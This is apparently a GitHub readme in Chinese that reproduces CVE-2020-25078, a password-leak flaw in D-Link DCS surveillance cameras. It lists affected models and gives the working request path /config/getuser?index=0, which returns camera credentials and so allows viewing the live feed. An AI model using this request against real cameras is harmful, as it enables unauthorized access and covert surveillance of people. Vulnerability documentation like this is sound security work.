Skip to content

Latest commit

 

History

History
 
 

D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
pic
pic
 
 
readme.md
readme.md
 
 

readme.md

0x00 软件介绍

D-Link DCS系列:D-Link是一家台湾科技公司,中文名:友讯科技,其旗下的DCS系列是畅销的网络摄像机

0x01 复现环境

复现环境:本地环境
复现版本:None
环境搭建:

0x02 利用条件

0x03 影响版本

DCS-2530L
DCS-2670L
DCS-4603
DCS-4622
等多个DCS系列系统

0x04 漏洞复现

添加URL:/config/getuser?index=0
即访问http://xxx.xxx.xxx.xxx/config/getuser?index=0会泄露账号和密码

使用账号密码登陆后即可查看摄像头的监控画面
image

0x05 批量脚本

0x06 参考链接

https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg